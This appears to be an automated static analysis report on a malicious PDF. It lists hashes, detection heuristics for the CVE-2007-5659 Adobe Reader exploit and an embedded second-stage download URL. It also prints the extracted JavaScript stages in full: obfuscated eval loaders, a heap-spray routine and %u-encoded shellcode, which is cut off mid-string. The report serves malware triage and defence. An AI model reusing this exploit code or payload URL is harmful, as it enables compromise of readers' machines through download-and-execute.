Malicious PDF — malware analysis report

Static analysis result for SHA-256 c47419fc12f4a7c1…

MALICIOUS

PDF

16.5 KB First seen: 2026-05-08
MD5: 7d7e0212689ade2b57867c2143780afa SHA-1: 6b715df892089367e8c9321e02cd58c5ec6001f9 SHA-256: c47419fc12f4a7c11c1387cc1e54cf94a8997541ac638280982936c1b0527ec8
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript artifacts, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', suggest an attempt to obfuscate and execute code. The primary function of this script appears to be downloading and executing a second-stage payload, as evidenced by the decoding of character codes and the structure of the embedded scripts. The lack of specific indicators for a known family leads to an 'unknown family' classification.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var PIrhike_8_bR10 = new Array();var EO__M_pEF__N = 0;var gB7_4_6BD = "";function J2_Cb0_J1JIE(F_M__PC, sMJh1EYSKCPIB){var e_8R8H2_m1e = sMJh1EYSKCPIB.toString();var T2_fK3fH = "";for(var GjVPRb607XJ = 0; GjVPRb607XJ < e_8R8H2_m1e.length; GjVPRb607XJ++) {var Q70wJir3U8_xp0 = parseInt(e_8R8H2_m1e.substr(GjVPRb607XJ, 1));if (!isNaN(Q70wJir3U8_xp0)) {Q70wJir3U8_xp0 = Q70wJir3U8_xp0.toString(16);if (Q70wJir3U8_xp0.length == 1) { Q70wJir3U8_xp0 = "0" + Q70wJir3U8_xp0; }else if (Q70wJir3U8_xp0.length  …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://leejg.com/cgi-bin/click3/n002106201r0409X940c337fY51fb417fZ0100f070 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1C9A 12312 bytes
SHA-256: 63d0d5f3d13ec602250739d0ab01a9a0cd363cf9144aef208fbb6b82a5de9927
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function iV4__Q8_PFmu(V_lBrbn____qB_g, CIi7s__qKq){var fgh = "va";var bc = String [ "fro" + 'mCha' + "rCode"];var H4Sj_w = arguments [ 'c' + "alle" + 'e' ];var lq_XUpt5I7c1dM3 = 0;try {var Hl_W4_r_xl_r = 0;if (app) {lq_XUpt5I7c1dM3++;CIi7s__qKq = pr[Hl_W4_r_xl_r].subject;}lq_XUpt5I7c1dM3++;} catch(e) { }var l__j45 = new Array();if (V_lBrbn____qB_g) { l__j45 = V_lBrbn____qB_g;} else {var k71d7l_sL047f = 0;var t36k3lit__y_U = 0;var R0_5LI_Y = 512;var C_2OG82_Q_B = 53;H4Sj_w = H4Sj_w.toString();C_2OG82_Q_B = C_2OG82_Q_B - 5;var U6H5sbqDtV = C_2OG82_Q_B + 10;U6H5sbqDtV = U6H5sbqDtV - 1;while(t36k3lit__y_U < H4Sj_w.length) {var k4SS7K = 1;var u____28Udn = H4Sj_w["charCo" + "deAt"](t36k3lit__y_U);if (u____28Udn >= C_2OG82_Q_B && u____28Udn <= U6H5sbqDtV) {if (k71d7l_sL047f == 4) {k71d7l_sL047f = 0;}if (isNaN(l__j45[k71d7l_sL047f])) {var Hl_W4_r_xl_r = 0;l__j45[k71d7l_sL047f] = Hl_W4_r_xl_r;}l__j45[k71d7l_sL047f] += u____28Udn;if (l__j45[k71d7l_sL047f] > R0_5LI_Y) {l__j45[k71d7l_sL047f] -= 512;}k71d7l_sL047f++;}t36k3lit__y_U++;}}k71d7l_sL047f = 4;for (var PrSU2y = 0; PrSU2y < 4; PrSU2y++) {if (l__j45[PrSU2y] > 256) {l__j45[PrSU2y] -= 256;}}var Uf8eky = 0;var dDWGWm = "";var Axj04QIe_Bv_ph = 0;var PLbK5d_o7c3K = 0;var V__o8t_i7P_264g = 0;var c2__1_qC_4h;var PTxcXLjgp6T53L = 23;while(PLbK5d_o7c3K < CIi7s__qKq.length) {var U4_vt0Ka_5XP06p = CIi7s__qKq.substr(PLbK5d_o7c3K, 1) + "YY";var fAR_MI_5_a_f8 = parseInt(U4_vt0Ka_5XP06p, PTxcXLjgp6T53L);if (Axj04QIe_Bv_ph) {c2__1_qC_4h += fAR_MI_5_a_f8;if (Uf8eky == 4) {Uf8eky -= 4;}var OH4uI_7dXP_u3 = c2__1_qC_4h;OH4uI_7dXP_u3 = OH4uI_7dXP_u3 - (V__o8t_i7P_264g + 2) * l__j45[Uf8eky];if (OH4uI_7dXP_u3 < 0) {OH4uI_7dXP_u3 = OH4uI_7dXP_u3 - Math.floor(OH4uI_7dXP_u3 / 256) * 256;}OH4uI_7dXP_u3 = String.fromCharCode(OH4uI_7dXP_u3);if (lq_XUpt5I7c1dM3 == 2) {dDWGWm += OH4uI_7dXP_u3;} else if (lq_XUpt5I7c1dM3 == 1) {dDWGWm += fAR_MI_5_a_f8;} else {dDWGWm += PLbK5d_o7c3K;}Uf8eky++;V__o8t_i7P_264g++;Axj04QIe_Bv_ph = 0;} else {c2__1_qC_4h = fAR_MI_5_a_f8 * 23;Axj04QIe_Bv_ph = 1;}PLbK5d_o7c3K++;}var ac = this;ac["e"+fgh + 'l'](dDWGWm);}
	iV4__Q8_PFmu(0, "220g0e6l5b62797i0b2k2b53398i932783211la617010dac684c7l813226082e6b8d9e3ca81h4b0a708c0ja1al3c7e7155871i218m4ib12e5ha161a38582ae9322236m437a72131m165a093081186f0i2a430m706j0m8i4f0h7g273c4j2i8g12aj9d6hb1424a0461af04866l1g664d3h7k1bam11196i8b0h7i56048k1e94934f5f45584g9g1h99082k8i709ib1152784418i905c8f3g3h4j45ak2a2b90788f83030a4m88885ga6411a415c1j6i94aa008i2j648i5h1b575g08770m3238306c2l8k920ia91e3m8a7a6l7m2m68ag4m13566g0h7d1ea8602i053d1c73a6057i4m61462j146287085j3i4b743m1k9f067f8i3f7k5970881iai3d1j92650i4j2d581i141a849149507e6b0b34074g398ia23e821834904iae13a8984k7h830e192h367b5k8c0h1m3b340g4ka41i9a1i5c8a4f4l092k43aa6b860b34184i947562a36i273j8a436c73455b22559jb2769j44130k772g71690b8f7i1b6d1m223153ab0a8i065j085d3h1m729i219l4b0m5l223f700f1c12329m58aa604a4098ag8hae716372644c151j9ham3j5d6500am0b117j2j7e0356a15i3m3b1j062e296c4d8kai33284k8f4i6m9636ad193f4m3h9d07ad1a4d96013c082i820a7m95322lal461c6i65079g2h2c77027b005j601k470f6h82a95k0f2d803f206d07a7a78e724l60355j065l00977c1c457e48a17329afab3c946a4j5c22a238al769g076d3d221j04110e7h5g586d8b0i07ae3f28636m0j7b2c1l1l3d8d079i853l796506ai0048675cad1i293g360057971la1a01k58475b923652a34aa81c382m7017a88c1l991b2l646k958m1k4l1j30002e8c0i730ba458a6764bad9k3m066f474h4l200614828k40892g30ai6c710b756c406c2l4d7h138k373f9582838b4a1m8e1eak9g4d4k6437429g2719a543546gag9k353a7i387c006k925k6g48440ea6ai6i486ham2ia91d917c7bah601a3h4e1m6b8321ae155k6gal5g1a4j90ak4b9i481f0c4d0jaf653817294698a4898l357l06609i6b7h9g5m0f9h5g0a9c4107afa0a99b5c7h5630ac5b86025m414e4m0k269c2903a20a8g684j5j481g4823a08b31593c439k129h0ea1407e6j8109362e292977660l7i185k904jacab9b925j725a15130g4m61899lb20b032c9c4m6fa96d25435f7166a41852a03e8dal26ak318f7g5823932l39836k8l81204e0i538d34868j3m8ba665a8654dad844h0h8l3a2c622l9c30b2037g0h592l1l6j9i16874e4069365d913f13243d9d7m094m3l106f160c7j686m6m484i972110193i8d7i0202381993286lab648h335k414faaak1h9g5d8e843g3041924i8db1601k3h5i1g6b8k21259d5b71872gaa1h8hah868c4c5538704g7167b1a21i569ab05f0850731m60ab3k599g5m0f1j7h2faa6m31a9ad087a6564664k202hai9b7914455e2mac9g237f7a0i8h4770643d0i4fac8c5h3e744k271a1213089i427h4a7m033533445h90963m9a4926921c08997a6a3b4h4b07ai002i61556i3l29342a947b7d06760l3g6m473g871b219c4k77324l153k0l9m8e1l961j42607a94ab435c352i7j3d800h650c1i66am8m5c24994h0h6j26463h3j880g82al6hae2l672997a81273751d865i499e3e17ah33796g8j7g3c265kab837j433l45302c181b051b5e6e608h7l1h0g904d95896j9e5b6a411b0mac2c9c6j9407372a4e8e53698c361l205j1g6b9619a69m6ia3aj3g052a829d6d8c481f0c583ka39iama1274h8m9c7jaj355k0d5gak2l5k9g591j9f6g3d0h5f2ba085977h556j2c369d5ha7a86335487f2fa7982m96a3118j67858d4b223hac8m8m2f6c4h46a3a4a0ae8h3k4i454f1638275m289f902ka3492k0e237i9m6h985j655930163k40667faf1d260h580j72a3aha0134k677m3da03h49a85ia40h2kb159ab7e5m269j38478m779da4192e112i902i848j3j0m1i6k1k9651246h4d178k4m4i6g47880g987e4h8g206kai9f9i0m946j1l792l1c76b28mb2006950838d4a2l8e1l929g4a523a6f450k1b1a1j505k7i99af3m1b8a2i7ea16f7k493j3l2eah1aa1723m94ac2b20466b7c6c946baj34483h5d9cala89m6i7iaj51033l858g549c5c3bal5a0j9d962d1h383f77a472ag5h5m27459h5b5715573m1c893a216g078b76976h3l503635175ia70c7m2e246c270ma0b0a98113826c5j7f1c1g491b9l5h1d4a2f229k9da4b19m637b6d6i93280l535j6j9012823l53a03b8b078d8a324j4b1011003b574l7b0faa175f9j6a760j89061k585d35921g55043e7f03511m5g0g9m7baa932d398k4l8l811h2b3959022g8i0j3b91a45j288d641e8i4l9j6k403c3a148dad8k8040134k5m29959i08736c29795d278h0l9d1j33796g8j7g3c268ca0996m3g4e432g2c1k2c19266484599f002j2i7k4g7k844a974133290i091j1f906g7g8b2b0g3m905d8a8m3maa476f496jb22aa68i6g9ea84f0a4b6i8g568c3d2lal4611a967ama40e499fa48jag495k274g0f6959175f18126g3d0h5f2ba085977h556j2c2c9d3ba58b5g0b486j3e199615889j1k866i5e851iai5312ab82296e5a289kab07a09d4d607170ac1i283831718g1m791j3490228m1ea692516h751gab0i255i626i01ad3j339c4m76977h1h4k8c806i0d0c5db05d9g2c3eb03h9j0389279i41478d7d9d723m2j2j539l2j8aal488j136d15747c2f986g01783l4i4b488kad9cad7k922h6f0b6jabak6j7h4h7i564j90b29518288b5b0a84532l7l08aba15172415l48151j1l25375m6699ak481b6a5d7h866k892e33532kb20kb0967490ac1i0h3d8e658k803hb2105h3a5j892h1m125b83925113348c8l8cae5c3h0h7e41a38m1k012m4e81ae5f9526762058a0687j207a2g00783aam6h0laham08a86a8d5g5a1c3286906f3a584d1e1m78b0b28e12673g60913j2e662maf5h296k4f281b1d17al8m4k6f6l620b0i3c5a619a943iad4i57902l080ea97253596m3816292d8c5h930g2c3h39ai70990c7b0l59594750b11d4i0947a11e2ga15i0eah8221772j3k666k9c9l1a5j3j5506ah6k9c650g1i6k2e9i6m328j3ma95k265c3h4291288iac4g02346f2b9e71078k5k1l82574m8h20a81e307j7g83651g3k961k0e9k6a796a2m330dal10283d7l6k8892453c961j9la5577i4m60512d9e1e2i7a705d91ak122086678d8g600c1h5b2i587i2cai003b99023f004b84a459036e24al703la58m36ae274h7ba490ai2f6837621b2l6iae5a2eb27j110g3d1d73am0k9h697l585c1a327f8g8l1d244k1d9da5048884135h705l641lai2i32816b37772i520lac9l967372594c5d93am343b316m6m08b2274h9l2180167d7463794g3mab0k548451ab0h01143c917m76a07c10228d5862951e260j6f832j51a66f9f83841f6e4j3g8a4j74774h2j11598jam8j0e689cal482j6l732b8m441g8k4a2d3k190l2a93ae6m8c5g5m2g909k9da36j407g531h9g0f0f052h6e85947j2e16622d8j9k474i3f6745a01ea3aa6d5k5l908h0g49692i7e8c3fad363m221j8k2bai6c6k6a803a02216a5b5l0d64af3l4812438e311d152h99a850a25382b07i063i52al5a0j6i6a3cai172a777f98912m62063b1e4057ae590k256211aa4609737h8e6j308g3e2haf3a7i1167142d4b121l7eal8h7i0f95495c6d1ca7660b7m6j104f66229k18a189ae42504c588f372b56316h6b3ja92a2e9g1c08997a99604d840ma50g2l5c8c7h0j03342f1952760l779c5d5d503l900h5h964f800b292e40097l869ma21j3d664j69ai212d135681377m0f4506a97j02765327637f108h262h364k99278i8g450k2j3i0c6h761l774b207e2755712j9k2403a258b15l2h099d1l93806b437337259l1d9e2i5k655m91834419692k9m7g737d2l3j1k10151j008j4h5i080g27246d50998g3mai403k4g4g8b00ad906a72893ga21m918g7a9b601k3b753k7e7201261f4978895k0c56652d47966e57a95g1h9k8g11a5461078am0a7h3j7k2h5hae3a8a9b5a44244b1g166h2iag9l1a6a3c8c691jam3daham6i10573d1e1ha49g909m3e806k7b9a0caj62589277307e512h9j25aj8laa793j765d0b220g32877h703fb10j339d4ba6a69aa02d528043913b4m8b77850e32aj34157l65ag7a1848624j6k7j165d335a8c0758194406b252ab9l500c6j6i989d2b2b3m1l8d338i895101256e0c6k7ma46f7b1i7c3325653f9k040e724h0g602a358ga50ga06c4l672j519laia422328k608k8l1c0l992c7h8b48725l63411j9ba32e6k51668jb22m436c5b6c856mac1k4c1j3m0006ai9d5h67043fa22h697m84993l4d0h494c796l0cah0j557fa66daj2b8k06430j3f4j265h1gab5g0d22461080848jaa5g5g382k9i6a8b9463141g7b1ia87ab17kai3b8d455c5g4caj3607855m407b3e2aa09g1d947j42504188992a04382d9h740m8222231d258h0e9i6d6i56770ma9055l685f7g11ad3j339g74789aa6a82d5h513a0k152h926a7c3b51al3m9d7a91af78443g5e7j727j1h2l07628k2b619i3g11b071037347336l4ja48h1i594125932a870471952g3hb09h8212784h14882k25700l922m2m77558m5459326maj8m74774i443b2a942aa2b15g83560c8h173e6e21ae846b9j52384k1c981f1l617f8c8h0d221a955b6h9043a14g6d3k6f84af2a9b3d6iad2l1h2e61ag778h6i4g0c743g6l9l0d1e1a496j008f8m3662al6ma25i5c1d4l48aa5k16193i40a2a5977d308g3d4lac3g7i116238246g121l7a228g9m0f95405f653ha7660aa38g364f662a0la49k89ae67554c5b8f370959548l6b3ja7242ja21c080e9i98434d84371a31555c8c7j2m26342f194m9da29d9c5d5m5865020h5h976aa82i292e3m0c7l889ma2431a885469ai1k2g12358137640c6904a97jb2745027637f9l8l274c364k98079287450k2m5m0e91761l734b1l5e2755700j9j0703a25c8j5m2d099dai017i6a43733d469h1i9e2i3j62608k83441f6g2i9h7g737j313l441015ak1k6i705i080g02208d50998m48ai203k4g4g85021g906a71ae3fa61m918g5797631k3b531l7f9301261d497d865k0c31850942966e5aa95f3f9k8g14a7491078am9a7a3e5h2h5ha93c899a5a44274c1ga16h2i8b7i1a673c8c671cal3aaham6f18563f1e1ha79k90803e804i5b9607aj62346k720m7e512k9m238i8laa7440565d0b220m34635d703f0110399e4ba6a17da32e528043001b308b77830c30ah34158161ad721848654j7381165d0l328f0e55a0670j2c4h218m6j128f501d5k2j1g6h4d0531b0aa7b0428530b6j9a1h776c40843j4m68360b1d0j9i7606864d0k97ac839m685i4858451g0ca81l6h6i8288871f4a8c596l9e51ae3i3m3l459aal1f6d5f67ac0ia92b5c5b9c8k3mac1g481g4l0123278i498jaj660i5c58904bag40291h5e3f798c0a1k3e4l9gb28i7m2g54084a1f5h849g633e295i12234912ad8i8e802i73435i003da70i601b454c2da296037f7f0a5k4m7d8g491g68b07m9d135b2m2d030ib293a86e7h6d6g9l1m2d3j5c617c03a7274f0e39b00k8j753a6a6l28ab3a5a8h7d8j1a1d353k0k4i6daf9c212f5e8141923m3d8f4ib12e5ha14lag8h89189i473976528l923b4h023f7jb26k9c650g1i6k2e9i6m328j3m9g5k265c3l1k91038i87498m434c397e7k0m9k4d1m792j356h2g9l0a2m9j8283575a309aa009af5g6f6661249m1k1ga543545h937l3k497i4d9hal467k586d14208f0h0m787087012l20326b7c7gaa63b010714g5ja423249e3h95b1349f23580d6da76f4i2m7a3j9a762d1a2i2677a0910c487l296g9k3l7h20780fal502a0j5f16adab0l9b4j6b4k53b05l7d8m552f294c2jai98al9m864b9d688c8k3h2e5h2jaf5h3f694c33b2acaa8m9j5b8444511638275m289i901m87272h902d7i8i6j7c637i81069k1g5a7f6l8m2j040j3a03626dab6da0314k606aaf2e45004d800i4e0h2m9k7562ac7d13288e6b86963l2j0i39a61a5e973k8b307k1k8150096h3m9e731d596a440j28alb2708f2233386h9ma198404f5850258l01960a3ma3780d4m4c0m6eaha2aj685l64582kadaka7a543545381923c43961j76946f954757411h98al187f3m6j7i0a0a15758081a25a1d1m48206496aab28i3h70873k943a8da26dag5m2e0b54368c6g07a20e5b9a85698g459127560f5f63045g1d9f5b1e9c77318m849d7d3m9164541e6884068f3i4i6e3h0aa42c02a20a6i37688l432659267k8f3h7h5k490m20ae099h6d7e5e810831am685m9h93388c1820921j7i0la89a45487711a60h44947d8i2g1m1f419j54ae9e7h1058884l630b3c4k0g5kab33540m6f147d6m0f933k2e837e7i8h3i4e222i903f84196k062g772d9e42337c4ia37755354k3la1070b7m65af3i5f299d8ha9946h188e5j489db2ai262fa0628m4m2m047b0lak9g5d6f6l45300d1b060661855187862g317b4d9fb0537l4m6214229l9lb25j455j7i1m1e30867c959g471a3m3f253h8bb1ae9c33620b6g943m7g9c75036e380j6l3i6g7aamag1526707a9e9d5m853540b23m721f7d31a05i14a13d0978am979f3b7l2h5ha65f860657101b603500961j018i1b8666556f440l4c13946i1h555b3b1l9j9998am6d783j50a82e25603l6k6f03054459181lag0k9h946f6e7f3e19215l8m548g2m1m3h409f4f7h23ae1l4g8a476106414i0d4c9030311f6708756e9h722749857g64951l4e114fa028741a4m020l5m1ka0420g5l6i1b982454684k0715080254055a6bai69ai11a03i2h684j2b710j9k052j8i66a58i4f0473a08j833e5g535827a0aha9015i7d6ia10e3a0g6l1j9188647j4b573l2j16061f7g5i870a082d458l7k98004a9j2i583h4g8b04ak9h5f8b984i1k4g5j854k8c71592e7h0j8b8m2d171e347ba95f9526770a60a0546i176h49007h250567429g91a79b3h613931ac5f9ma577474a6a1b1m9c2f03a63k8l4b808c0jaa4823a08b17623a4894ai90b0a06l71765da32j08535g8k6f0305184h0m4jac107f816755753e15003b576e9c2g1m13429g757h95ae25517l473d00405c8k78ab2i5m1l6cb0a58l259d4d4159597a72232b0j328fah59923b04237f1k9f5013934j0h95491g46149a018j8a49875m5h2h9d9i1f785b445c4j4k8jb2a3a91070568m635h3098288h9a5g6f6b58228m00992i4b6061990a202c8a3c7ib04e8b465k3l2h06260c7b6g879iak0c158886948e6k1g4f5l4472aa182a173264aa641c287j9j750a5j2903460j74652f1f4346a1887801337l2l629f6d810i88451g893a9k3m077e768g732k5c2c2ma6338h");
legacy_pdfkit_stage_001.js deobfuscated-js nested inline base-23 callee-key decoded JavaScript at offset 0x1C9A 5093 bytes
SHA-256: 25141e69fcaba3b601112ef475af71ecf35335f5a7184d9c5795623a9a263b6c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var PIrhike_8_bR10 = new Array();var EO__M_pEF__N = 0;var gB7_4_6BD = "";function J2_Cb0_J1JIE(F_M__PC, sMJh1EYSKCPIB){var e_8R8H2_m1e = sMJh1EYSKCPIB.toString();var T2_fK3fH = "";for(var GjVPRb607XJ = 0; GjVPRb607XJ < e_8R8H2_m1e.length; GjVPRb607XJ++) {var Q70wJir3U8_xp0 = parseInt(e_8R8H2_m1e.substr(GjVPRb607XJ, 1));if (!isNaN(Q70wJir3U8_xp0)) {Q70wJir3U8_xp0 = Q70wJir3U8_xp0.toString(16);if (Q70wJir3U8_xp0.length == 1) { Q70wJir3U8_xp0 = "0" + Q70wJir3U8_xp0; }else if (Q70wJir3U8_xp0.length != 2) { Q70wJir3U8_xp0 = "00"; }T2_fK3fH = Q70wJir3U8_xp0 + T2_fK3fH;}}while(T2_fK3fH.length < 8) { T2_fK3fH = "0" + T2_fK3fH; }var q_I____66_0_1rh = F_M__PC.toString(16);if (q_I____66_0_1rh.length == 1) { q_I____66_0_1rh = "0" + q_I____66_0_1rh; }else if (q_I____66_0_1rh.length != 2) { q_I____66_0_1rh = "00"; }T2_fK3fH = "3" + q_I____66_0_1rh + "P" + T2_fK3fH;return T2_fK3fH;}function S32Wq4_fqHo(l_U5n_klb0o, e_K5_byI6ayEf){var bf_i_Q0_A_p2_60 = new Array("");var q_MW_A62 = l_U5n_klb0o;var j7R0_JP;if ((j7R0_JP = l_U5n_klb0o.lastIndexOf("%u00")) != -1) {if (j7R0_JP + 6 == l_U5n_klb0o.length) {bf_i_Q0_A_p2_60[0] = l_U5n_klb0o.substr(j7R0_JP + 4, 2);q_MW_A62 = l_U5n_klb0o.substring(0, j7R0_JP);}}j7R0_JP = 1;for (GjVPRb607XJ = 0; GjVPRb607XJ < e_K5_byI6ayEf.length; GjVPRb607XJ++) {var s___f6_3 = e_K5_byI6ayEf.charCodeAt(GjVPRb607XJ).toString(16);if (s___f6_3.length == 1) { s___f6_3 = "0" + s___f6_3; }bf_i_Q0_A_p2_60[j7R0_JP] = s___f6_3;j7R0_JP++;}GjVPRb607XJ = bf_i_Q0_A_p2_60[0].length ? 0 : 1;bf_i_Q0_A_p2_60[j7R0_JP] = "00";bf_i_Q0_A_p2_60[j7R0_JP + 1] = "00";j7R0_JP += 2;if ((bf_i_Q0_A_p2_60.length - GjVPRb607XJ) % 2) {bf_i_Q0_A_p2_60[j7R0_JP] = "00";}while(GjVPRb607XJ < bf_i_Q0_A_p2_60.length) {q_MW_A62 += "%u" + bf_i_Q0_A_p2_60[GjVPRb607XJ + 1] + bf_i_Q0_A_p2_60[GjVPRb607XJ];GjVPRb607XJ += 2;}q_MW_A62 += "%u0000";return q_MW_A62;}function c6__PjlP4(PXP6ojo_OBVgAi, Ady21v32oC){while (PXP6ojo_OBVgAi.length*2<Ady21v32oC) {PXP6ojo_OBVgAi += PXP6ojo_OBVgAi;}PXP6ojo_OBVgAi = PXP6ojo_OBVgAi.substring(0,Ady21v32oC/2);return PXP6ojo_OBVgAi;}function Euft1O8YgbW(j5V1ls6M_aX5_q, I_8_k0_J, agq_o5Gj4_ma){var H0_m__prbtc = 0x0c0c0c0c;var PXP6ojo_OBVgAi = unescape(I_8_k0_J);var e_K5_byI6ayEf = J2_Cb0_J1JIE(j5V1ls6M_aX5_q, agq_o5Gj4_ma);var R51MAa0U = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var l_U5n_klb0o = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5